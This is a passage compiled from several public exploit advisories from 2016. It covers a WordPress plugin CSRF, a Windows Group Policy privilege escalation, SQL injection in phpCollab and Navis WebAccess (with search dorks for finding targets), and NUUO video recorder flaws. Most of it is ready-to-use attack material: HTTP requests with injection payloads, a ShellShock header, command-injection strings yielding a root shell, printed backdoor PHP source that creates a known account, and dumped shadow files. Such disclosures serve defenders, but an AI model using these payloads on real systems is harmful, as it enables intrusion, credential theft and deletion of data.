- Adding illegal content to the victim's server.
- Adding very large files to the victim's server to exaust the amount of avalible disk space.
Details
When a (media) file is added from the server, the source is not validated. This means that not only files from the localhost can be added, but also from other sources. The affected code is not protected with an anti-Cross-Site Request Forgery token.
The function handle_imports() only removes slashes. The vulnerability exists in the file add-from-server/class.add-from-server.php (line 213). Because slashes are removed, the file that will be uploaded must exist in the server root. For example: www.example.com/largefile.txt
The host and filename will be set in a separate parameter, so no slashes are needed.
Proof of concept
POST /wp-admin/upload.php?page=add-from-server HTTP/1.1
Host: <target>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import
# Exploit Title: Group Policy Elevation of Privilege Vulnerability
# Date: 08-08-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64)
# CVE : CVE-2016-3223
# Category: Privilege Escalation
SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials)
SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies.
1) Prerequisites:
- Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local)
- Domain User Credentials are known with no Administrative rights.
- Computer has to be connected on a network.
- Fake Domain Controller
2) Reproduce:
STEP 1: Determine domain of the target computer (e.g. domain.local)
STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1)
STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!).
STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials).
STEP 6: Establish network connection between the target system and the newly created Domain Controller.
STEP 7: Create a Group Policy called "Create Local Admin"
STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators".
STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force"
STEP 10: User Policy update will complete successfully.
STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators"
STEP 12: "TestAdmin" user will be member of the Administrators group.
3) Impact:
A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller
4) Solution:
Install the latest patches from 14-06-2016 using Windows Update.
5) References:
https://technet.microsoft.com/en-us/library/security/ms16-072.aspx
https://support.microsoft.com/en-us/kb/3163622
6) Credits:
Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com)
Document Title:
===============
phpCollab v2.5 CMS - SQL Injection Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1898
Release Date:
=============
2016-08-08
Vulnerability Laboratory ID (VL-ID):
====================================
1898
Common Vulnerability Scoring System:
====================================
6.6
Product & Service Introduction:
===============================
phpCollab is an open source internet-enabled system for use in projects that require collaboration over the internet. Those organizations,
such as consulting firms, that rely on a division between firm-side and client-side information will benefit most from use of phpCollab.
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a remote sql-injection web vulnerability in the official phpCollab v2.5 content management system.
Vulnerability Disclosure Timeline:
==================================
2016-08-08: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
phpCollab Community
Product: phpCollab - Content Management System 2.5
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the official phpCollab v2.5 content management system.
The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.
The sql-injection vulnerability is located in the `id` parameter of the `./phpcollab/users/` module GET method request.
Remote attackers are able to execute own sql commands by usage of the insecure `emailusers.php` file GET method request.
The attack vector of the vulnerability is application-side and the request method to inject is GET The vulnerability
is a classic select remote sql-injection.
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./phpcollab/users/
Vulnerable File(s):
[+] emailusers.php
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1'[SQL-INJECTION VULNERABILITY!]&&PHPSESSID=ghtu76jt276nji04lua07930t5
--- Error Exception Logs [SQL] ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 2
-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1%27&&PHPSESSID=ghtu76jt276nji04lua07930t5
Mime Type[text/html]
Request Header:
Host[phpcollab.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470586689.1470585617.;
_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fphpcollab.localhost:8080%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Server[nginx/1.2.1]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]
Reference(s):
http://phpcollab.localhost:8080/
http://phpcollab.localhost:8080/phpcollab/
http://phpcollab.localhost:8080/phpcollab/users/
http://phpcollab.localhost:8080/phpcollab/users/emailusers.php
Solution - Fix & Patch:
=======================
The vulnerability can be patched by usage of a prepared statement in the emailusers.php file GET method request.
Disallow special chars and escape the input and outpit context entries to prevent further sql-injection attacks.
Security Risk:
==============
The security risk of the remote sql-injection web vulnerability in the id parameter of the emailusers.php file is estimated as high. (CVSS 6.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Product -> Navis WebAccess - SQL Injection
Date -> 8/8/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.navis.com/
Product Download -> http://navis.com/pr_webaccess.jsp (currently under maintenance)
Product Version -> Express/All
DBMS -> Oracle
Tested on > Apache/2.0.54 (Win32)
{{ Dorks }}
"Copyright © 2016 Navis, A Zebra Technologies Company"
"Confidential Information of Navis, A Zebra Technologies Company"
inurl:GKEY= ext:do
inurl:/express/secure/Today.jsp
navis.com webaccess
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"Navis WebAccess is a web-based application that provides all parties across the terminal with an easy-to-use web browser interface for accessing a wealth of transaction data that was previously inaccessible from outside the terminal. All terminal constitiuents, including shipping lines, trucking companies, port authorities, government agencies, agents, shippers, consignees, distribution centers and depots are better served with 24/7 access to real-time container, vessel and truck transaction information. Users can view load and discharge lists, reports, and EDO details as well as view and make appointments, set and release holds, download and upload EDI files and pay for demurrage."
Vulnerability: SQL Injection
File: /express/showNotice.do
Vul Parameter: GKEY
================================================================================================
Test #1
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'
Response Error:
ORA-00933: SQL command not properly ended
================================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
Response Error:
ORA-00600: internal error code, arguments: [733], [277608912], [pga heap], [], [], [], [], [], [], [], [], [] ORA-06512: at "SYS.XMLTYPE", line 310 ORA-06512: at line 1
======================================================================================================================================================================================
~
NUUO Backdoor (strong_user.php) Remote Shell Access
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script
that when called, a backdoor user is created with poweruser privileges that is able
to read and write files on the affected device. The backdoor user 'bbb' when created
with the password '111111' by visiting 'strong_user.php' script is able to initiate a
secure shell session and further steal and/or destroy sensitive information.
==================================================================
/strong_user.php:
-------------------------------
<?php
class ReadPasswd{
private $file;
private $fileData;
private $error;
function __construct($file) {
try{
if (is_file($file))
{
$this->fileData = file($file);
$this->file = $file;
}
else
{
throw new Exception("Couldn’t open file.");
}
} catch (Exception $e) {
$this->error[] = $e->getMessage();
}
}
public function getAllHTML(){
foreach ($this->fileData as $content)
{
$temp = explode(':', $content);
$output .= "<b>Username: {$temp[0]} </b><br />";
$output .= "Validation: {$temp[1]} <br />";
$output .= "User Identifier: {$temp[2]} <br />";
$output .= "Group Identifier: {$temp[3]} <br />";
$output .= "Gecos Field: {$temp[4]} <br />";
$output .= "Home Directory: {$temp[5]} <br />";
$output .= "Shell: {$temp[6]} <br />";
$output .= "<br />";
}
return $output;
}
public function getAllCLI() {
foreach ($this->fileData as $content)
{
$temp = explode(':', $content);
$output .= "Username: {$temp[0]} n";
$output .= "Validation: {$temp[1]} n";
$output .= "User Identifier: {$temp[2]} n";
$output .= "Group Identifier: {$temp[3]} n";
$output .= "Gecos Field: {$temp[4]} n";
$output .= "Home Directory: {$temp[5]} n";
$output .= "Shell: {$temp[6]} n";
$output .= "n";
}
return $output;
}
public function searchUser($user,$data=0) {
try{
$data = array();
if (is_string($user))
{
foreach($this->fileData as $line)
{
$temp = explode(':', $line);
if (in_array($user,$temp))
{
if ($data) return 1;
$data['username'] = $temp[0];
$data['validation'] = $temp[1];
$data['user_identifier'] = $temp[2];
$data['group_identifier'] = $temp[3];
$data['gecos'] = $temp[4];
$data['home_directory'] = $temp[5];
$data['shell'] = $temp[6];
}
}
}
else
{
throw new Exception('A search error has occured.');
}
} catch (Exception $e) {
$this->error[] = $e->getMessage();
}
return $data;
}
public function getError() {
return $this->error;
}
public function deleteUser($user) {
try{
if ($this->searchUser($user,1))
{
foreach ($this->fileData as $line)
{
$lines = explode(":",$line);
if (!in_array($user,$lines))
{
$final .= $line;
}
}
if(!file_put_contents($this->file,$final))
{
throw new Exception("Could not delete user.");
}
}
else
{
throw new Exception("User doesn’t exist.");
}
} catch (Exception $e) {
echo $this->error[] = $e->getMessage();
}
}
}
/*
echo "Strong test ";
ma_getuser();
ma_getgroup();
$result = array('users' => array(), 'groups' => array());
echo "<br>";
echo $maUser;
echo "<br>";
echo $maGroup;
echo "<br>";
foreach($maGroup as $key =>$value)
{
$tmp = array();
$tmp['groupname'] = $maGroup[$key]->strGroupname;
$tmp['members'] = array();
echo "Group (" . $key . ") === " . $maGroup[$key]->strGroupname;
echo "<br><br>";
ma_getgroupmember($maGroup[$key]->strGroupname);
foreach ($maGroupmember as $mKey => $mValue)
{
echo " User ($mKey) ===> $mValue ";
echo "<br>";
array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
}
//foreach($value as $userkey => $uservalue)
//{
// echo " User ($userkey) ===> $uservalue ";
// echo "<br>";
//}
echo "<br>";
echo implode(",", $tmp['members']);
echo "<br>";
$tmp['membersStr'] = implode(",", $tmp['members']);
array_push($result['groups'], $tmp);
}
echo "<h1> Other </h1>";
$tmp = array();
$tmp['groupname'] = 'admin';
ma_getgroupmember($tmp['groupname']);
//ma_getgroupmember('');
$tmp['members'] = array();
foreach ($maGroupmember as $mKey => $mValue)
{
array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
echo $maGroupmember[$mKey]->strUsername . "<br>";
}
$tmp['membersStr'] = implode(",", $tmp['members']);
array_push($result['groups'], $tmp);
echo "<h1> USER </h1>";
foreach ( $maUser as $key => $value)
{
$tmp = array();
$tmp['username'] = $maUser[$key]->strUsername;
$tmp['groups'] = array();
foreach ($result['groups'] as $gKey => $gValue)
{
if (in_array($tmp['username'], $gValue['members']))
array_push($tmp['groups'], $gValue['groupname']);
}
$tmp['groupsStr'] = implode(",", $tmp['groups']);
echo $tmp['username'] . "<br>";
echo $tmp['groupsStr'] . "<br>";
array_push($result['users'], $tmp);
}
*/
echo "<h1> Read Passwd </h1>";
$passclass = new ReadPasswd('/etc/passwd');
echo $passclass->getAllHTML();
echo "<h1> add user </h1>";
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111");
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H");
$output = system("adduser bbb -G poweruser -D ");
/*
$f = popen ("/usr/bin/passwd bbb","r");
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 111 ,,, $out <br>";
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 222 ,,, $out <br>";
pclose($f);
//echo $output . " kkk <br>";
*/
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w") // stdout is a pipe that the child will write to
);
$process = proc_open('/usr/bin/passwd bbb', $descriptorspec, $pipes);
if (is_resource($process))
{
$read = fread($pipes[1], 1024);
$out = fwrite($pipes[0],"111111\n");
echo $read . " read 111 ,,, $out <br>";
$read = fread($pipes[1], 1024);
$out = fwrite($pipes[0],"111111\n");
echo $read . " read 111 ,,, $out <br>";
fclose($pipes[0]);
fclose($pipes[1]);
}
proc_close($process);
//$handle = popen("/bin/ls", "r");
//$read = fread($handle, 1024);
//echo $read;
//pclose($handle);
?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5354
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php
14.01.2016
--
#1
Read of /etc/shadow file before backdoor was enabled:
------------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
#2
Issuing GET request to the script:
-----------------------------------
GET http://10.0.0.17/strong_user.php HTTP/1.1
#3
Read of /etc/shadow file after backdoor was enabled:
-----------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
#4
The backdoor account is able to read the /etc/shadow file:
-----------------------------------------------------------
login as: bbb
bbb@10.0.0.17's password:
-sh-3.2$ id
Using fallback suid method
uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser)
-sh-3.2$ cat /etc/shadow
Using fallback suid method
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
-sh-3.2$
NUUO Arbitrary File Deletion Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.
==================================================================
/deletefile.php:
----------------
1: <?php
2: $filename=$_POST['filename'];
3: unlink($filename);
4: if (file_exists($filename))
5: echo "fail";
6: else echo "true";
7: ?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php
14.01.2016
--
POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
filename=He_molested_murdered_and_mutilated_her.mp4
NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: Firmware Version: 02.02.00
NVR Version: 02.02.0000.0040
Device Pack Version: 04.07.0000.0030
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo suffers from authenticated ShellShock
vulnerability. This could allow an attacker to gain control over a targeted computer
if exploited successfully. The vulnerability affects Bash, a common component known
as a shell that appears in many versions of Linux and Unix.
Tested on: GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5352
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5352.php
14.01.2016
--
POST /cgi-bin/cgi_system HTTP/1.1
Host: 10.0.0.17
Content-Length: 91
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: () { :;}; /bin/ls -al
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/protocol_ftp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
cmd=ftp_setup&act=modify&com_port=21&pasv_port_from=1024&pasv_port_to=65535&services=enable
Response:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Jan 2016 13:09:11 GMT
Server: lighttpd/1.4.28
Content-Length: 1652
drwxr-xr-x 3 root root 402 Oct 20 2014 .
drwxr-xr-x 6 root root 1024 Jan 4 22:49 ..
-rwxr-xr-x 1 root root 256564 Oct 20 2014 DaylightSavingWatcher
-rwxr-xr-x 1 root root 51376 Oct 20 2014 NuDatTool
-rwxr-xr-x 1 root root 60500 Oct 20 2014 NuDiscovery
-rwxr-xr-x 1 root root 930652 Oct 20 2014 NuHWMgn
-rwxr-xr-x 1 root root 8236 Oct 20 2014 NuNICWatcher
-rwxr-xr-x 1 root root 309 Oct 20 2014 after_mount.sh
lrwxrwxrwx 1 root root 7 Oct 20 2014 archive_mrg_mv -> lite_mv
-rwxr-xr-x 1 root root 1114844 Oct 20 2014 auto_upgrade
lrwxrwxrwx 1 root root 7 Oct 20 2014 cgi_main -> lite_mv
-rwxr-xr-x 1 root root 576992 Oct 20 2014 cgi_system
lrwxrwxrwx 1 root root 7 Oct 20 2014 ddns_update -> lite_mv
-rwxr-xr-x 1 root root 570 Oct 20 2014 getdhcpip.sh
-rwxr-xr-x 1 root root 388 Oct 20 2014 halt
drwxr-xr-x 2 root root 41 Oct 20 2014 lib
-rwxr-xr-x 1 root root 3827188 Oct 20 2014 lite_mv
-rwxr-xr-x 1 root root 15396 Oct 20 2014 nagent_mv
-rwxr-xr-x 1 root root 9836 Oct 20 2014 nu_btns
-rwxr-xr-x 1 root root 3496 Oct 20 2014 nudaemon
-rwxr-xr-x 1 root root 10616 Oct 20 2014 nufancontrol
-rwxr-xr-x 1 root root 12772 Oct 20 2014 nuklogd
-rwxr-xr-x 1 root root 392 Oct 20 2014 reboot
-rwxr-xr-x 1 root root 13144 Oct 20 2014 thwstat
FTP Setup OK
NUUO Multiple OS Command Injection Vulnerabilities
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040, NT-4040(R))
DP: <=04.07.0000.0030, <=04.03.0000.0035
FW: <=02.02.00, <=1.7.0
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
NUUO Titan NVR is NUUO's Linux-based open platform recording solution. It is built
on Linux Foundation, with cross-platform Windows and MAC client software. It supports
up to 64 channels of megapixel recording with 250 Mbps throughput. It also comes with
a myriads of features that will sure to fulfill even the most demanding projects. Supports
over 2300 camera models from over 100 vendors.
Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo and NVRTitan suffers from multiple
authenticated OS command injection vulnerabilities. This can be exploited to inject
and execute arbitrary shell commands as the root user.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
lighttpd/1.4.35
PHP/5.5.3
PHP/5.6.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5351
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5351.php
14.01.2016
--
NVRTitan:
POST /handle_iscsi.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/iscsi.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin
Connection: close
act=discover&address=1.1.1.1|echo%20pwn&port=3260
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Mon, 18 Apr 2016 08:52:17 GMT
Server: lighttpd/1.4.35
Content-Length: x
pwn
============================================================
NVRmini/2/Solo/Crystal:
GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144 HTTP/1.1
Host: 10.0.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://10.0.0.17/raid.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
---
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
Host: 10.0.0.17
Content-Length: 97
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.17
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.17/save_config.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no
---
Sample session from commix:
Shell > whoami
root
Shell > ls
Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml
NUUO Local File Disclosure Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
